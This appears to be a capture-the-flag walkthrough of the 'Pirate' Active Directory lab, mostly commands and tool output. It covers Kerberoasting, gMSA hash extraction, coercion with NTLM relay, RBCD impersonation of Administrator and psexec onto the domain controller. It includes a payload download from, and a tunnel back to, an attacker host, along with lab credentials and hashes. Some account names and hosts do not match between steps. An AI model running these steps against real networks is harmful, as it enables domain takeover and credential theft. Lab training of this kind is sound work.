Pirate

Pirate

Level : Hard

As is common in real life pentests, you will start the Pirate box with credentials for the following account

  • User: pentest
  • Password: p3nt3st2025!&
nmap -sC -sV $IP_TARGET -Pn
Starting Nmap 7.95 ( https://nmap.org ) at 2026-02-28 23:27 CET
Nmap scan report for 10.129.8.145
Host is up (0.052s latency).
Not shown: 985 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-03-01 05:27:31Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: pirate.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2026-03-01T05:28:54+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.pirate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.pirate.htb
| Not valid before: 2025-06-09T14:05:15
|_Not valid after:  2026-06-09T14:05:15
443/tcp  open  https?
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: pirate.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2026-03-01T05:28:53+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.pirate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.pirate.htb
| Not valid before: 2025-06-09T14:05:15
|_Not valid after:  2026-06-09T14:05:15
2179/tcp open  vmrdp?
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: pirate.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2026-03-01T05:28:54+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.pirate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.pirate.htb
| Not valid before: 2025-06-09T14:05:15
|_Not valid after:  2026-06-09T14:05:15
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: pirate.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2026-03-01T05:28:53+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.pirate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.pirate.htb
| Not valid before: 2025-06-09T14:05:15
|_Not valid after:  2026-06-09T14:05:15
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2026-03-01T05:28:14
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
|_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 108.90 seconds

SMB enumeration

The GPOs are stored in SYSVOL and we have read access rights in smb, so this can give us important information. I use RECURSE ON to download the files in recursive mode and PROMPT OFF to avoid a request for each file.

Bloodhound enumeration

BloodHound was used to map the Active Directory environment and identify potential attack paths from the compromised user. The objective was to find privilege escalation paths.

bloodhound-python -u pentest -p 'p3nt3st2025!&' -d pirate.htb -ns $IP_TARGET -dc DC01.pirate.htb -c all

Kerberoasting

The goal of enumerating SPNs is to identify service accounts in Active Directory. Accounts with SPNs are potential targets for Kerberoasting, as we can request a Kerberos TGS for the service and obtain a ticket encrypted with the service account’s password hash. This ticket can then be cracked offline using tools such as Hashcat in order to recover the plaintext credentials.

sudo rdate -n $IP_TARGET
GetUserSPNs.py -request -dc-ip $IP_TARGET pirate.htb/pentest -outputfile hashes.kerberoast

If user have a SPN get the TGS:

crackmapexec smb 10.129.9.111 -u pentest -p 'p3nt3st2025!&' --shares

GetUserSPNs.py pirate.htb/pentest -dc-ip 10.129.9.111 -request -rc4

hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule

No vulnerable service accounts were identified, suggesting Kerberoasting is not a viable attack path in this environment.

MAQ section

The MachineAccountQuota was found to be 10, meaning a low-privileged user can create up to 10 machine accounts in the domain. This is critical because machine accounts can be abused for attacks such as Resource-Based Constrained Delegation (RBCD).

netexec ldap $IP_TARGET -u pentest -p 'p3nt3st2025!&' -M maq
[*] Initializing LDAP protocol database
LDAP        10.129.9.111    389    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01)(domain:pirate.htb) (signing:None) (channel binding:Never)
LDAP        10.129.9.111    389    DC01             [+] pirate.htb\pentest:p3nt3st2025!&
MAQ         10.129.9.111    389    DC01             [*] Getting the MachineAccountQuota
MAQ         10.129.9.111    389    DC01             MachineAccountQuota: 10

Create new machine:

impacket-addcomputer pirate.htb/pentest:'p3nt3st2025!&' \
-computer-name PWNBOX$ \
-computer-pass Passw0rd! \
-dc-ip $IP_TARGET

Certipy failure

Certipy failed to connect to the ADCS endpoint, indicating that the Certificate Authority is not reachable from the current network segment or is not exposed to the compromised host.

certipy find -u pentest -p 'p3nt3st2025!&' -dc-ip $IP_TARGET -vulnerable
[*] Retrieving CA configuration for 'pirate-DC01-CA' via RRP
[-] Failed to connect to remote registry: [Errno Connection error (192.168.100.1:445)] [Errno 111] Connection refused
[-] Use -debug to print a stacktrace
[!] Failed to get CA configuration for 'pirate-DC01-CA' via RRP: 'NoneType' object has no attribute 'request'

RBCD section

We leveraged MachineAccountQuota to create a new computer account in the domain. This is a key prerequisite for Resource-Based Constrained Delegation (RBCD), as it allows us to introduce a controlled computer object into Active Directory.

We then abused Active Directory permissions to modify the target machine’s delegation settings by writing to the msDS-AllowedToActOnBehalfOfOtherIdentity attribute. This effectively allowed our machine account to impersonate domain users, including privileged accounts, against the target system.

  • DC01 –> 10.129.9.111
  • WEB01 –> 192.168.100.2
  • CA –> 192.168.100.1

Spooler / coercion scan

During enumeration, the Print Spooler service was identified as enabled on the Domain Controller. This service can be abused to force the system to authenticate to an attacker-controlled host. This behavior is commonly used in NTLM relay attacks to capture authentication attempts from high-value machines.

netexec smb $IP_TARGET -u pentest -p 'p3nt3st2025!&' -M spooler
SMB         10.129.9.111    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:pirate.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.9.111    445    DC01             [+] pirate.htb\pentest:p3nt3st2025!&
SPOOLER     10.129.9.111    445    DC01             Spooler service enabled

This authentication coercion provides an opportunity to capture NTLM authentication attempts from the Domain Controller, which can then be relayed to Active Directory services in order to modify sensitive permissions.

coercer scan -t $IP_TARGET -u 'pentest' -p 'p3nt3st2025!&' -d pirate.htb -v

The coerced authentication was intended to be relayed to LDAP services in order to perform privileged Active Directory modifications. We configured DC01$ to trust PWNBOX$ for delegation.

python3 /usr/share/doc/python3-impacket/examples/rbcd.py -action write -delegate-to DC01$ -delegate-from PWNBOX$ pirate.htb/pentest:'p3nt3st2025!&'

Authentication Coercion

During further enumeration, authentication coercion was performed against the Domain Controller using the Print Spooler service.

This technique forces the target system to authenticate to an attacker-controlled host, exposing NTLM authentication attempts.

python3 coercer.py  auth -u 'pentest' -p 'p3nt3st2025!&' -d pirate.htb -dc-ip $IP_TARGET

___    __
/'___`\ /\ \
_____   _ __    __          /\_\ /\ \\ \ \/'\
/\ '__`\/\`'__\/'__`\ _______\/_/// /__\ \ , <
\ \ \L\ \ \ \//\  __//\______\  // /_\ \\ \ \\`\
\ \ ,__/\ \_\\ \____\/______/ /\______/ \ \_\ \_\
\ \ \/  \/_/ \/____/         \/_____/   \/_/\/_/
\ \_\                                      v3.1
\/_/
@unsigned_sh0rt
@Tw1sm

[22:30:51] INFO     Retrieved 7 results total.
[22:30:51] INFO     Testing started at 2026-03-01 22:30:51
[22:30:51] INFO     Using 10 threads
[22:30:52] INFO     VALID CREDENTIALS: pirate.htb\EXCH01$:exch01
[22:30:52] INFO     VALID CREDENTIALS: pirate.htb\MS01$:ms01

Kerberos Authentication using Machine Account (MS01$)

The MS01$ machine account credentials were used to request a Kerberos Ticket Granting Ticket (TGT) using its NTLM hash.

python3 getTGT.py pirate.htb/MS01$:ms01 -dc-ip $IP_TARGET
export KRB5CCNAME=MS01$.ccache
klist

gMSA Enumeration via LDAP

Using the previously obtained Kerberos ticket (MS01$), we authenticated to LDAP with Kerberos instead of NTLM.

$nxc ldap dc01.pirate.htb -k --use-kcache --gmsa
LDAP        dc01.pirate.htb 389    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:PIRATE.HTB) (signing:None) (channel binding:Never)
LDAP        dc01.pirate.htb 389    DC01             [+] PIRATE.HTB\MS01$ from ccache
LDAP        dc01.pirate.htb 389    DC01             [*] Getting GMSA Passwords
LDAP        dc01.pirate.htb 389    DC01             Account: gMSA_ADCS_prod$      NTLM: 304106f739822ea2ad8ebe23f802d078     PrincipalsAllowedToReadPassword: Domain Secure Servers
LDAP        dc01.pirate.htb 389    DC01             Account: gMSA_ADFS_prod$      NTLM: 8126756fb2e69697bfcb04816e685839     PrincipalsAllowedToReadPassword: Domain Secure Servers

This allowed us to query Group Managed Service Accounts (gMSA) stored in Active Directory.

GMSA accounts are service accounts whose passwords are managed automatically by the domain controller and can only be retrieved by authorized principals.

In this case, the MS01$ machine account had sufficient privileges (via membership in privileged groups) to retrieve gMSA password material.

The following accounts were identified:

  • gMSA_ADCS_prod$ –> NTLM: 304106f739822ea2ad8ebe23f802d078
  • gMSA_ADFS_prod$ –> NTLM: 8126756fb2e69697bfcb04816e685839

These NTLM hashes can be used to impersonate service accounts and escalate privileges within the domain.

Using the previously obtained NTLM hash from the gMSA accounts, we attempted to authenticate as both machine and service accounts.

Credential Reuse and Lateral Movement

evil-winrm -i $IP_TARGET -u gMSA_ADCS_prod$ -H 304106f739822ea2ad8ebe23f802d078

evil-winrm -i $IP_TARGET -u gMSA_ADFS_prod$ -H 8126756fb2e69697bfcb04816e685839

Lateral Movement & Internal Access (WEB01 / ADCS / ADFS)

After obtaining service account access, we established a foothold on internal systems using WinRM.

Invoke-WebRequest -Uri "http://10.10.14.82:8000/agent.exe" -OutFile "C:\Users\gmsa_adfs_prod$\Documents\agent.exe"

This payload was transferred to maintain access and facilitate further interaction with the internal network segment.

Network Pivoting (Ligolo-ng)

To access internal subnets (including 192.168.100.0/24), a tunnel was established using Ligolo-ng.

sudo ip tuntap add dev ligolo mode tun user $(whoami)
sudo ip tuntap add user $(whoami) mode tun ligolo
sudo ip link set ligolo up
sudo ip route add 192.168.100.0/24 dev ligolo
sudo ip addr add 192.168.100.2/24 dev ligolo

On the target machine, the agent was executed to establish the tunnel:

./agent.exe -connect 10.10.14.82:11601 -ignore-cert

This provided routed access to previously unreachable internal hosts such as WEB01 and CA infrastructure.

Machine Account Creation (RBCD Preparation)

To continue privilege escalation via Resource-Based Constrained Delegation (RBCD), a new machine account was created in Active Directory.

python3 addcomputer.py pirate.htb/pentest:'p3nt3st2025!&' \
-dc-ip $IP_TARGET \
-computer-name ATTACKBOX$ \
-computer-pass Pass123!

Impacket v0.13.0.dev0+20240916.171021.65b774de - Copyright Fortra, LLC and its affiliated companies

[*] Successfully added machine account ATTACKBOX$ with password Pass123!.

This resulted in successful creation of the machine account ATTACKBOX$.

Resource-Based Constrained Delegation (RBCD Abuse)

The newly created machine account was then used to modify delegation settings on a target machine via RBCD.

rbcd.py -delegate-to 'QFHDSGYV$' -delegate-from 'ATTACKBOX$' -dc-ip $IP_TARGET -action write 'pirate.htb/pentest:p3nt3st2025!&'

This granted the controlled computer account the ability to act on behalf of other users against the target system through S4U2Proxy delegation.

LDAP Relay for Automatic Delegation Rights Modification

An NTLM relay attack was performed against the Domain Controller’s LDAP service to automatically modify Active Directory permissions.

sudo python3 krbrelayx.py -t ldaps://$IP_TARGET --delegate-access

During the relay, authentication from GMSA_ADFS_PROD$ was captured and successfully relayed to LDAP.

This resulted in:

  • Automatic creation of a new machine account (QFHDSGYV$)
  • Modification of delegation permissions on the target object
  • Granting constrained delegation rights via msDS-AllowedToActOnBehalfOfOtherIdentity

NTLM Coercion & LDAP Relay (Delegation Abuse)

An authentication coercion attack was performed against the Domain Controller in order to force NTLM authentication from a privileged machine account.

sudo $(which coercer) coerce -l 10.10.14.82 -t 192.168.100.2 -d pirate.htb -u 'gMSA_ADFS_prod$' --hashes :8126756fb2e69697bfcb04816e685839 --always-continue

This triggered the Print Spooler service, forcing the Domain Controller to authenticate back to the attacker-controlled host.

LDAP NTLM Relay to AD

The captured authentication was relayed to LDAP using ntlmrelayx, allowing modification of Active Directory objects.

sudo python3 ntlmrelayx.py -t ldaps://$IP_TARGET --delegate-access --remove-mic -smb2support
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Protocol Client DCSYNC loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server on port 445
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server on port 9389
[*] Setting up RAW Server on port 6666
[*] Multirelay disabled

[*] Servers started, waiting for connections
[*] SMBD-Thread-5 (process_request_thread): Received connection from 192.168.100.2, attacking target ldaps://10.129.11.195
[*] Authenticating against ldaps://10.129.11.195 as PIRATE.HTB/GMSA_ADFS_PROD$ SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] Attempting to create computer in: CN=Computers,DC=pirate,DC=htb
[*] Adding new computer with username: QFHDSGYV$ and password: u{pyq<r:,qo@Xld result: OK
[*] Delegation rights modified succesfully!
[*] QFHDSGYV$ can now impersonate users on GMSA_ADFS_PROD$ via S4U2Proxy

During the relay attack:

  • Authentication from GMSA_ADFS_PROD$ was successfully relayed
  • A new machine account was automatically created: QFHDSGYV$
  • Delegation rights were modified via msDS-AllowedToActOnBehalfOfOtherIdentity

This enabled Resource-Based Constrained Delegation (RBCD) against the target environment.

RBCD-Based Impersonation (Kerberos S4U)

Using the delegated machine account, a Kerberos service ticket was requested to impersonate a privileged user.

getST.py -spn 'cifs/WEB01.pirate.local' -impersonate 'Administrator' -dc-ip $IP_TARGET 'pirate.htb/TJDJIXEF$:I^(WJ8f5jy)@q_,'

This granted authenticated access as Administrator on the WEB01 system via Kerberos delegation.

Lateral Movement (WEB01 Access)

impacket.psexec -k -no-pass WEB01.pirate.htb

Privilege Escalation

A password reset was performed on a privileged account:

bloodyAD -d pirate.htb -u 'a.white' -p 'E2nvAOKSz5Xz2MJu' -H $IP_TARGET -i $IP_TARGET set password a.white_adm 'password123$'

Service Principal Name (SPN) Abuse

A Service Principal Name was added to enable Kerberos-based impersonation of the WEB01 service.

python3 addspn.py -u 'pirate.htb\a.white_adm' -p 'password123$' -t 'WEB01$' -s 'HTTP/WEB01.pirate.htb' -r $IP_TARGET

A Service Principal Name was added to enable Kerberos-based impersonation of the WEB01 service.

impacket.getST -spn 'HTTP/WEB01.pirate.htb' -impersonate 'Administrator' 'pirate.htb/a.white_adm:password123$' -dc-ip $IP_TARGET  -altservice 'CIFS/DC01.pirate.htb'

impacket.psexec -k -no-pass DC01.pirate.htb